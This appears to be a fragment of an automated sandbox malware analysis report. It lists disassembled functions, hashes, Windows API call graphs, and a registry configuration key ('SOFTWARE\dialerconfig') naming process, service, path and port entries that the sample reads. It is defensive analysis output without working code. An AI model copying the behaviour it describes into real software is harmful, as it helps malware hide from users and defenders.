                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ErrorFileLanguagesLastModuleNamePreferredRestoreThread_invalid_parameter_noinfo
                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\main.exe
                                                                                                                                                            • API String ID: 2553983749-1502169466
                                                                                                                                                            • Opcode ID: 2dc50b8d6a573f30b306f0085b97da4955317f93722b68647fdb996873f18b46
                                                                                                                                                            • Instruction ID: a7dcda30a1f6a29f9825e0a4e8a0faec67b3ec5399aed4d6f2fec20a275af139
                                                                                                                                                            • Opcode Fuzzy Hash: 2dc50b8d6a573f30b306f0085b97da4955317f93722b68647fdb996873f18b46
                                                                                                                                                            • Instruction Fuzzy Hash: 5941AB36E1CB0286EB14DF25E4808FD26A4EB84BD4F554037EA0EC7B95DE3EE4A18340
                                                                                                                                                            Function 00007FF6D6EAD9E8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ErrorFileLastWrite
                                                                                                                                                            • String ID: U
                                                                                                                                                            • API String ID: 442123175-4171548499
                                                                                                                                                            • Opcode ID: 76bc1a38fdffd9ebe3e6e71a83b0ba687688a06d9a48e83c019cb8b3d6fff0c8
                                                                                                                                                            • Instruction ID: c2ccbcedab8b029fe11711cd08b27cfdf0e93c84812792f0abc1838f9f20f064
                                                                                                                                                            • Opcode Fuzzy Hash: 76bc1a38fdffd9ebe3e6e71a83b0ba687688a06d9a48e83c019cb8b3d6fff0c8
                                                                                                                                                            • Instruction Fuzzy Hash: 2A41BF72B1CA8185DB208F25E8447AEA7A1FB88B94F804132EE4DC7798EF3DD455C740
                                                                                                                                                            Function 00007FF6D6EB0108 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CurrentDirectory
                                                                                                                                                            • String ID: :
                                                                                                                                                            • API String ID: 1611563598-336475711
                                                                                                                                                            • Opcode ID: 5f6034cdb323e25da13304688bcfaa40664c8172194540dca50913ba3db948d1
                                                                                                                                                            • Instruction ID: b2c7458ce1438c45a6a91400602e214a436b48df6839a809a10d624fe62ffbc5
                                                                                                                                                            • Opcode Fuzzy Hash: 5f6034cdb323e25da13304688bcfaa40664c8172194540dca50913ba3db948d1
                                                                                                                                                            • Instruction Fuzzy Hash: 3E21E472F0C78181EB249B19D44426D73B2FB84B88F498137DA8D87284DF7EE958C751
                                                                                                                                                            Function 00007FF6D6E92C30 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57windowCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Message$ByteCharMultiWide
                                                                                                                                                            • String ID: Error detected
                                                                                                                                                            • API String ID: 1878133881-3513342764
                                                                                                                                                            • Opcode ID: 339977713d7da472da6bf6cde3ee098e7c711e0ac5788cc03ff0aed866900f2e
                                                                                                                                                            • Instruction ID: 7ca4dcc458003163edb0fe672e6fa8ec45f68a4337619ae79924bb626c001ee7
                                                                                                                                                            • Opcode Fuzzy Hash: 339977713d7da472da6bf6cde3ee098e7c711e0ac5788cc03ff0aed866900f2e
                                                                                                                                                            • Instruction Fuzzy Hash: 4F219572A2C68181EB20DB14F4516EEB364FF94788F801137EA8D87A69DF3DD625CB40
                                                                                                                                                            Function 00007FF6D6E92B10 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57windowCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Message$ByteCharMultiWide
                                                                                                                                                            • String ID: Fatal error detected
                                                                                                                                                            • API String ID: 1878133881-4025702859
                                                                                                                                                            • Opcode ID: cc7983d7ddd1ca4fe6b0e820e7fb498cdab092a0274b8afa64f738c4e3f04b3b
                                                                                                                                                            • Instruction ID: 5d9da8b6c21ba14ffc1c511db85bf3f57d846406713136e4af26ddd60b49cccd
                                                                                                                                                            • Opcode Fuzzy Hash: cc7983d7ddd1ca4fe6b0e820e7fb498cdab092a0274b8afa64f738c4e3f04b3b
                                                                                                                                                            • Instruction Fuzzy Hash: DE217172A2C68281EB20DB14E4516EEA364FF94788F801137E78D87A69DF3DD625CB50
                                                                                                                                                            Function 00007FF6D6EA0678 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ExceptionFileHeaderRaise
                                                                                                                                                            • String ID: csm
                                                                                                                                                            • API String ID: 2573137834-1018135373
                                                                                                                                                            • Opcode ID: fd7208e01f832ae2c3cc6aa9bb96c2aefef2cc6e58d8a602234d9daac72df826
                                                                                                                                                            • Instruction ID: 53f7004be06a3e41387cd6e12dd7cc4acee0d94066415adc46f5d2c26f2be71b
                                                                                                                                                            • Opcode Fuzzy Hash: fd7208e01f832ae2c3cc6aa9bb96c2aefef2cc6e58d8a602234d9daac72df826
                                                                                                                                                            • Instruction Fuzzy Hash: A0112B32A1CB8582EB218B15F44026D77E5FBC8B98F584231DA8D47B65DF3DD5A1CB00
                                                                                                                                                            Function 00007FF6D6EB1594 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: DriveType_invalid_parameter_noinfo
                                                                                                                                                            • String ID: :
                                                                                                                                                            • API String ID: 2595371189-336475711
                                                                                                                                                            • Opcode ID: b3a001ff98c302286219bbad5be65c90682500455353c0d2fccc423422cbb122
                                                                                                                                                            • Instruction ID: f09ec0eea95d6ca09f9550f4f1675dd310b61ed535d157290bc9e115835d6a5e
                                                                                                                                                            • Opcode Fuzzy Hash: b3a001ff98c302286219bbad5be65c90682500455353c0d2fccc423422cbb122
                                                                                                                                                            • Instruction Fuzzy Hash: 6901F761D1C30282FB20AF6494512BE63A0EF44744F801037E54EC6285EF3DD564C714

                                                                                                                                                            Execution Graph

                                                                                                                                                            Execution Coverage:1%
                                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                            Signature Coverage:0%
                                                                                                                                                            Total number of Nodes:250
                                                                                                                                                            Total number of Limit Nodes:9
                                                                                                                                                            execution_graph 14859 230d90e273c 14861 230d90e276a 14859->14861 14860 230d90e28d4 14861->14860 14862 230d90e2858 LoadLibraryA 14861->14862 14862->14861 14863 230d921fa50 14864 230d921fa60 14863->14864 14871 230d9221d0c 14864->14871 14866 230d921fa69 14867 230d921fa77 14866->14867 14879 230d921f858 GetStartupInfoW 14866->14879 14872 230d9221d2b 14871->14872 14878 230d9221d54 14871->14878 14890 230d921d6ac 14872->14890 14876 230d9221d3c 14876->14866 14878->14876 14896 230d9221c14 14878->14896 14880 230d921f927 14879->14880 14881 230d921f88d 14879->14881 14885 230d921f948 14880->14885 14881->14880 14882 230d9221d0c 19 API calls 14881->14882 14883 230d921f8b6 14882->14883 14883->14880 14884 230d921f8e0 GetFileType 14883->14884 14884->14883 14886 230d921f966 14885->14886 14887 230d921f9c1 GetStdHandle 14886->14887 14888 230d921fa35 14886->14888 14887->14886 14889 230d921f9d4 GetFileType 14887->14889 14888->14867 14889->14886 14903 230d921cfa0 14890->14903 14892 230d921d6b5 14893 230d921d570 14892->14893 14911 230d921d408 14893->14911 14897 230d921d6cc __free_lconv_mon 4 API calls 14896->14897 14898 230d9221c35 14897->14898 14899 230d9221c97 14898->14899 15055 230d921f60c 14898->15055 14900 230d921d744 __free_lconv_mon 4 API calls 14899->14900 14901 230d9221ca1 14900->14901 14901->14878 14905 230d921cfb5 __vcrt_InitializeCriticalSectionEx 14903->14905 14904 230d921cfe1 FlsSetValue 14906 230d921cff3 __free_lconv_mon 14904->14906 14907 230d921cfd1 _invalid_parameter_noinfo __free_lconv_mon 14904->14907 14905->14904 14905->14907 14908 230d921d020 FlsSetValue 14906->14908 14909 230d921d010 FlsSetValue 14906->14909 14907->14892 14908->14907 14910 230d921d02c FlsSetValue 14908->14910 14909->14907 14910->14907 14912 230d921d433 14911->14912 14919 230d921d4a4 14912->14919 14914 230d921d45a 14915 230d921d47d 14914->14915 14925 230d921c7a0 14914->14925 14917 230d921c7a0 _invalid_parameter_noinfo 17 API calls 14915->14917 14918 230d921d492 14915->14918 14917->14918 14918->14876 14936 230d921d1ec 14919->14936 14921 230d921d4df 14921->14914 14922 230d921d4ce _invalid_parameter_noinfo 14922->14921 14923 230d921d408 _invalid_parameter_noinfo 17 API calls 14922->14923 14924 230d921d589 14923->14924 14924->14914 14926 230d921c7f8 14925->14926 14927 230d921c7af __vcrt_InitializeCriticalSectionEx 14925->14927 14926->14915 14928 230d921d068 _invalid_parameter_noinfo 7 API calls 14927->14928 14929 230d921c7de _invalid_parameter_noinfo 14928->14929 14929->14926 14930 230d921c7a0 _invalid_parameter_noinfo 17 API calls 14929->14930 14931 230d921c827 14930->14931 15000 230d9220430 14931->15000 14937 230d921d233 _invalid_parameter_noinfo 14936->14937 14938 230d921d208 __vcrt_InitializeCriticalSectionEx 14936->14938 14937->14922 14940 230d921d068 14938->14940 14941 230d921d087 FlsGetValue 14940->14941 14943 230d921d09c 14940->14943 14942 230d921d094 14941->14942 14941->14943 14942->14937 14943->14942 14954 230d921d6cc 14943->14954 14946 230d921d0dc FlsSetValue 14947 230d921d0fa 14946->14947 14948 230d921d0e8 FlsSetValue 14946->14948 14962 230d921cb94 14947->14962 14949 230d921d0cc 14948->14949 14958 230d921d744 14949->14958 14953 230d921d744 __free_lconv_mon 4 API calls 14953->14942 14957 230d921d6dd __free_lconv_mon 14954->14957 14955 230d921d6ac __free_lconv_mon 4 API calls 14956 230d921d0be 14955->14956 14956->14946 14956->14949 14957->14955 14957->14956 14959 230d921d77a 14958->14959 14960 230d921d749 __free_lconv_mon __vcrt_InitializeCriticalSectionEx 14958->14960 14959->14942 14960->14959 14961 230d921d6ac __free_lconv_mon 4 API calls 14960->14961 14961->14959 14963 230d921cc46 __free_lconv_mon 14962->14963 14966 230d921caec 14963->14966 14965 230d921cc5b 14965->14953 14967 230d921cb08 14966->14967 14970 230d921cd7c 14967->14970 14969 230d921cb1e 14969->14965 14971 230d921cdc4 Concurrency::details::SchedulerProxy::DeleteThis 14970->14971 14972 230d921cd98 Concurrency::details::SchedulerProxy::DeleteThis 14970->14972 14971->14969 14972->14971 14974 230d92207b4 14972->14974 14975 230d9220850 14974->14975 14978 230d92207d7 14974->14978 14976 230d92208a3 14975->14976 14979 230d921d744 __free_lconv_mon FlsSetValue FlsSetValue FlsSetValue FlsSetValue 14975->14979 14977 230d9220954 Concurrency::details::SchedulerProxy::DeleteThis FlsSetValue FlsSetValue FlsSetValue FlsSetValue 14976->14977 14985 230d92208af 14977->14985 14978->14975 14980 230d9220816 14978->14980 14986 230d921d744 __free_lconv_mon FlsSetValue FlsSetValue FlsSetValue FlsSetValue 14978->14986 14981 230d9220874 14979->14981 14982 230d9220838 14980->14982 14989 230d921d744 __free_lconv_mon FlsSetValue FlsSetValue FlsSetValue FlsSetValue 14980->14989 14983 230d921d744 __free_lconv_mon FlsSetValue FlsSetValue FlsSetValue FlsSetValue 14981->14983 14984 230d921d744 __free_lconv_mon FlsSetValue FlsSetValue FlsSetValue FlsSetValue 14982->14984 14987 230d9220888 14983->14987 14991 230d9220844 14984->14991 14990 230d922090e 14985->14990 14996 230d921d744 FlsSetValue FlsSetValue FlsSetValue FlsSetValue __free_lconv_mon 14985->14996 14992 230d922080a 14986->14992 14988 230d921d744 __free_lconv_mon FlsSetValue FlsSetValue FlsSetValue FlsSetValue 14987->14988 14993 230d9220897 14988->14993 14994 230d922082c 14989->14994 14995 230d921d744 __free_lconv_mon FlsSetValue FlsSetValue FlsSetValue FlsSetValue 14991->14995 14997 230d9222fc8 __free_lconv_mon FlsSetValue FlsSetValue FlsSetValue FlsSetValue 14992->14997 14998 230d921d744 __free_lconv_mon FlsSetValue FlsSetValue FlsSetValue FlsSetValue 14993->14998 14999 230d92230d4 __free_lconv_num FlsSetValue FlsSetValue FlsSetValue FlsSetValue 14994->14999 14995->14975 14996->14985 14997->14980 14998->14976 14999->14982 15001 230d9220449 15000->15001 15003 230d921c84f 15000->15003 15001->15003 15008 230d9220a5c 15001->15008 15004 230d922049c 15003->15004 15005 230d921c85f 15004->15005 15006 230d92204b5 15004->15006 15005->14915 15006->15005 15052 230d921ecf0 15006->15052 15013 230d921ce28 15008->15013 15010 230d9220a6b 15012 230d9220aa4 15010->15012 15048 230d9220acc 15010->15048 15012->15003 15014 230d921ce3d __vcrt_InitializeCriticalSectionEx 15013->15014 15015 230d921ce69 FlsSetValue 15014->15015 15016 230d921ce4c FlsGetValue 15014->15016 15018 230d921ce7b 15015->15018 15021 230d921ce59 _invalid_parameter_noinfo 15015->15021 15017 230d921ce63 15016->15017 15016->15021 15017->15015 15019 230d921d6cc __free_lconv_mon 4 API calls 15018->15019 15020 230d921ce8a 15019->15020 15022 230d921cea8 FlsSetValue 15020->15022 15023 230d921ce98 FlsSetValue 15020->15023 15024 230d921cee2 15021->15024 15032 230d921cf28 FlsSetValue 15021->15032 15033 230d921cf0d FlsGetValue 15021->15033 15026 230d921cec6 15022->15026 15027 230d921ceb4 FlsSetValue 15022->15027 15025 230d921cea1 15023->15025 15024->15010 15029 230d921d744 __free_lconv_mon 4 API calls 15025->15029 15028 230d921cb94 __free_lconv_mon 4 API calls 15026->15028 15027->15025 15030 230d921cece 15028->15030 15029->15021 15031 230d921d744 __free_lconv_mon 4 API calls 15030->15031 15031->15021 15034 230d921cf35 15032->15034 15038 230d921cf1a 15032->15038 15035 230d921cf22 15033->15035 15033->15038 15036 230d921d6cc __free_lconv_mon 4 API calls 15034->15036 15035->15032 15037 230d921cf44 15036->15037 15039 230d921cf62 FlsSetValue 15037->15039 15040 230d921cf52 FlsSetValue 15037->15040 15038->15010 15042 230d921cf80 15039->15042 15043 230d921cf6e FlsSetValue 15039->15043 15041 230d921cf5b 15040->15041 15044 230d921d744 __free_lconv_mon 4 API calls 15041->15044 15045 230d921cb94 __free_lconv_mon 4 API calls 15042->15045 15043->15041 15044->15038 15046 230d921cf88 15045->15046 15047 230d921d744 __free_lconv_mon 4 API calls 15046->15047 15047->15038 15049 230d9220aeb 15048->15049 15050 230d9220ade Concurrency::details::SchedulerProxy::DeleteThis 15048->15050 15049->15012 15050->15049 15051 230d92207b4 Concurrency::details::SchedulerProxy::DeleteThis 4 API calls 15050->15051 15051->15049 15053 230d921ce28 _invalid_parameter_noinfo 14 API calls 15052->15053 15054 230d921ecf9 15053->15054 15060 230d921f394 15055->15060 15057 230d921f642 15058 230d921f661 InitializeCriticalSectionAndSpinCount 15057->15058 15059 230d921f647 15057->15059 15058->15059 15059->14898 15061 230d921f3f1 __vcrt_InitializeCriticalSectionEx 15060->15061 15062 230d921f3ec __vcrt_InitializeCriticalSectionEx 15060->15062 15061->15057 15062->15061 15063 230d921f50d FreeLibrary 15062->15063 15063->15061 15064 230d9211abc 15070 230d9211628 GetProcessHeap 15064->15070 15066 230d9211ad2 Sleep SleepEx 15068 230d9211acb 15066->15068 15068->15066 15069 230d9211598 StrCmpIW StrCmpW 15068->15069 15115 230d92118b4 15068->15115 15069->15068 15071 230d9211648 __free_lconv_mon 15070->15071 15132 230d9211268 GetProcessHeap 15071->15132 15073 230d9211650 15074 230d9211268 2 API calls 15073->15074 15075 230d9211661 15074->15075 15076 230d9211268 2 API calls 15075->15076 15077 230d921166a 15076->15077 15078 230d9211268 2 API calls 15077->15078 15079 230d9211673 15078->15079 15080 230d921168e RegOpenKeyExW 15079->15080 15081 230d92116c0 RegOpenKeyExW 15080->15081 15082 230d92118a6 15080->15082 15083 230d92116e9 15081->15083 15084 230d92116ff RegOpenKeyExW 15081->15084 15082->15068 15143 230d92112bc RegQueryInfoKeyW 15083->15143 15086 230d9211723 15084->15086 15087 230d921173a RegOpenKeyExW 15084->15087 15136 230d921104c RegQueryInfoKeyW 15086->15136 15090 230d9211775 RegOpenKeyExW 15087->15090 15091 230d921175e 15087->15091 15088 230d92116f5 RegCloseKey 15088->15084 15092 230d92117b0 RegOpenKeyExW 15090->15092 15093 230d9211799 15090->15093 15095 230d92112bc 11 API calls 15091->15095 15097 230d92117d4 15092->15097 15098 230d92117eb RegOpenKeyExW 15092->15098 15096 230d92112bc 11 API calls 15093->15096 15099 230d921176b RegCloseKey 15095->15099 15100 230d92117a6 RegCloseKey 15096->15100 15101 230d92112bc 11 API calls 15097->15101 15102 230d9211826 RegOpenKeyExW 15098->15102 15103 230d921180f 15098->15103 15099->15090 15100->15092 15104 230d92117e1 RegCloseKey 15101->15104 15106 230d9211861 RegOpenKeyExW 15102->15106 15107 230d921184a 15102->15107 15105 230d921104c 4 API calls 15103->15105 15104->15098 15110 230d921181c RegCloseKey 15105->15110 15108 230d9211885 15106->15108 15109 230d921189c RegCloseKey 15106->15109 15111 230d921104c 4 API calls 15107->15111 15112 230d921104c 4 API calls 15108->15112 15109->15082 15110->15102 15113 230d9211857 RegCloseKey 15111->15113 15114 230d9211892 RegCloseKey 15112->15114 15113->15106 15114->15109 15160 230d92114a4 15115->15160 15154 230d9226168 15132->15154 15134 230d9211283 GetProcessHeap 15135 230d92112ae __free_lconv_mon 15134->15135 15135->15073 15137 230d92111b5 RegCloseKey 15136->15137 15138 230d92110bf 15136->15138 15137->15087 15138->15137 15139 230d92110cf RegEnumValueW 15138->15139 15141 230d9211125 __free_lconv_mon 15139->15141 15140 230d921114e GetProcessHeap 15140->15141 15141->15137 15141->15139 15141->15140 15142 230d921116e GetProcessHeap 15141->15142 15142->15141 15144 230d9211327 GetProcessHeap 15143->15144 15145 230d921148a __free_lconv_mon 15143->15145 15148 230d921133e __free_lconv_mon 15144->15148 15145->15088 15146 230d9211352 RegEnumValueW 15146->15148 15147 230d9211476 GetProcessHeap 15147->15145 15148->15146 15148->15147 15150 230d92113d3 GetProcessHeap 15148->15150 15151 230d921141e lstrlenW GetProcessHeap 15148->15151 15152 230d9211443 StrCpyW 15148->15152 15153 230d92113f3 GetProcessHeap 15148->15153 15155 230d921152c 15148->15155 15150->15148 15151->15148 15152->15148 15153->15148 15158 230d9211546 15155->15158 15159 230d921157c 15155->15159 15156 230d9211565 StrCmpW 15156->15158 15157 230d921155d StrCmpIW 15157->15158 15158->15156 15158->15157 15158->15159 15159->15148 15161 230d92114e1 GetProcessHeap 15160->15161 15162 230d92114c1 GetProcessHeap 15160->15162 15166 230d9226180 15161->15166 15163 230d92114da __free_lconv_mon 15162->15163 15163->15161 15163->15162 15167 230d9226182 15166->15167

                                                                                                                                                            Executed Functions

                                                                                                                                                            Function 00000230D9211628 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000005.00000002.2589942922.00000230D9210000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000230D9210000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_5_2_230d9210000_cmd.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                                                                                                            • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                                                                                                            • API String ID: 106492572-2879589442
                                                                                                                                                            • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                                                                                                            • Instruction ID: a4898b9ddb79ab63c2fd01afc388a7b2ff027f7be92fc7101da2243cc42138c5
                                                                                                                                                            • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                                                                                                            • Instruction Fuzzy Hash: 9F712B36A11B5886EB909FA1E8E9AA933F4F784B88F001112DD4E57B6DDF3CC654C354
                                                                                                                                                            Function 00000230D921328C Relevance: 4.5, APIs: 3, Instructions: 43threadCOMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000005.00000002.2589942922.00000230D9210000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000230D9210000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_5_2_230d9210000_cmd.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1683269324-0
                                                                                                                                                            • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                                                                                                            • Instruction ID: 8c9c8e134c0f66cf40b6b4492ffc8d35df17761a32da757294729dd767992b37
                                                                                                                                                            • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                                                                                                            • Instruction Fuzzy Hash: 09112A21E14B8E82FBE0ABE1B8ED77A22F5F754344F50412999065159DEF7CC3688278
                                                                                                                                                            Function 00000230D921F948 Relevance: 3.1, APIs: 2, Instructions: 71COMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000005.00000002.2589942922.00000230D9210000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000230D9210000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_5_2_230d9210000_cmd.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: FileHandleType
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3000768030-0
                                                                                                                                                            • Opcode ID: a07d0c2e6d1ea39fb6922406f7202b79799826504b1902530f517849248bbcbd
                                                                                                                                                            • Instruction ID: 717a6422028dbd0011ff7efc3e71b886950c08bc739e98b716fae0c06884ecd4
                                                                                                                                                            • Opcode Fuzzy Hash: a07d0c2e6d1ea39fb6922406f7202b79799826504b1902530f517849248bbcbd
                                                                                                                                                            • Instruction Fuzzy Hash: 3531B832B10B4891D7A09B5495E82B86AF0F345BB0F681309DB7A173E8CB3CD671D350
                                                                                                                                                            Function 00000230D9211ABC Relevance: 3.1, APIs: 2, Instructions: 68sleepCOMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            APIs
                                                                                                                                                              • Part of subcall function 00000230D9211628: GetProcessHeap.KERNEL32 ref: 00000230D9211633
                                                                                                                                                              • Part of subcall function 00000230D9211628: HeapAlloc.KERNEL32 ref: 00000230D9211642
                                                                                                                                                              • Part of subcall function 00000230D9211628: RegOpenKeyExW.ADVAPI32 ref: 00000230D92116B2
                                                                                                                                                              • Part of subcall function 00000230D9211628: RegOpenKeyExW.ADVAPI32 ref: 00000230D92116DF
